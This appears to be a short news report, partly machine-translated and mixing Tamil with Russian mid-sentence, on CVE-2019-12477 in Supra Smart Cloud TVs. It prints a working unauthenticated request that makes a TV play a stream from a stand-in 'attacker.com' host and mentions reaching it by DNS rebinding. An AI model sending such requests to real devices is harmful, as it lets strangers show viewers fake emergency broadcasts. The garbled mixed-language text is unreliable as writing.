கற்பனையான வீடியோவைக் காண்பிக்க உங்களை அனுமதிக்கும் சூப்ரா ஸ்மார்ட் டிவிகளில் உள்ள பாதிப்பு

В телевизорах Supra Smart Cloud TV அடையாளம் காணப்பட்டது уязвимость (CVE-2019-12477), позволяющая подменить просматриваемую в данный момент передачу на контент атакующего. В качестве примера продемонстрирован вывод фиктивного предупреждения о возникновении чрезвычайной ситуации.

Для атаки достаточно отправить специально оформленный сетевой запрос, не требующий аутентификации. В частности, можно обратиться к обработчику «/remote/media_control?action=setUri&uri=» указав URL m3u8-файла с параметрами видео, например «http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8».

В большинстве случаев доступ к IP-адресу телевизора ограничен внутренней сетью, но так как запрос отправляется через HTTP возможно применение методов для обращения к внутренним ресурсам при открытии пользователем специально оформленной внешней страницы (например, под видом запроса картинки или используя метод டிஎன்எஸ் ரீபைண்டிங்).

ஆதாரம்: opennet.ru